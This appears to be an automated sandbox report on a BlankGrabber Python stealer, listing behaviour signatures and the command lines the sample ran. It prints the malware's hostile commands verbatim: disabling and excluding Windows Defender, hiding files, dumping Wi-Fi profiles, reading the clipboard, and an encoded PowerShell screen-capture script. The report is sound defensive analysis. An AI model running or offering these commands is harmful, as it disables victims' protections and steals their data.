Analysis Overview
SHA256
4d63d075c49aace33f4c890a9d36a01d2768b8f70bea6a37a55a1228aad70175
Threat Level: Known bad
The file release.rar was found to be: Known bad.
Malicious Activity Summary
A stealer written in Python and packaged with Pyinstaller
Blankgrabber family
Command and Scripting Interpreter: PowerShell
Reads user/profile data of web browsers
Executes dropped EXE
Loads dropped DLL
UPX packed file
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Accesses cryptocurrency files/wallets, possible credential harvesting
Hide Artifacts: Hidden Files and Directories
Event Triggered Execution: Netsh Helper DLL
Enumerates physical storage devices
Gathers system information
Suspicious use of SendNotifyMessage
Modifies data under HKEY_USERS
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of WriteProcessMemory
Views/modifies file attributes
Suspicious use of FindShellTrayWindow
Enumerates system info in registry
Runs ping.exe
Detects videocard installed
Suspicious use of AdjustPrivilegeToken
Enumerates processes with tasklist
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-19 14:53
Signatures
A stealer written in Python and packaged with Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blankgrabber family
Analysis: behavioral6
Detonation Overview
Submitted
2024-06-19 14:53
Reported
2024-06-19 14:56
Platform
win10v2004-20240611-en
Max time kernel
138s
Max time network
125s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\_MEI27522\rar.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Hide Artifacts: Hidden Files and Directories
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\release\map\map.exe
"C:\Users\Admin\AppData\Local\Temp\release\map\map.exe"
C:\Users\Admin\AppData\Local\Temp\release\map\map.exe
"C:\Users\Admin\AppData\Local\Temp\release\map\map.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\release\map\map.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\release\map\map.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\release\map\map.exe""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Temp\release\map\map.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACA